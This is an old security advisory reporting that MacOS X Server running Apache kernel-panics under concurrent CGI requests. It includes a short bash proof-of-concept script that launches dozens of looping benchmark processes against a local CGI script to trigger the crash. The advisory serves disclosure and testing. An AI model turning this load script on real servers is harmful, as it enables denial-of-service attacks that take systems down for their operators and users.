|
Vulnerability X system (cgi attack) Affected MacOS Description While doing performance tests with different web servers, ju found, that MacOS X Server running apache crashed under medium load, when calling CGI-scripts. It displays "system panic" and a stack trace with ipc_task_init. The problem appears when 32 or more processes are doing GET-requests to a cgi script in a loop. This was reproducable on two different G3-Macs with 100%. It doesn't matter, if the processes run local or remote (tried via LAN with 10 MBit). Crashes appear after 30 seconds to a couple of minutes. It is supposed this is a bug in the Mac kernel and *not* limited to CGI scripts, however ju could find no other ways to trigger it yet. You can check your machine, using the apache benchmark (ab, include on the MacOS X server) with the script at the end. Any other program to do HTTP requests in a loop should do. This issue is published under: http://www.heise.de/ct/english/99/13/186/ Script: #!/bin/bash # # CGI-McPanic: script to crash MacOS X with # concurrent calls to a CGI-Script # # before use, do: # # chmod a+x /Local/Library/WebServer/CGI-Executables/test-cgi # # then call # # bash ./CGI-McPanic # NUMPROC=32 i=0 while [ $i -le $NUMPROC ] do i=$[$i + 1] ab -t 3600 http://localhost/cgi-bin/test-cgi & done Solution Disabling CGI scripts might help for some time.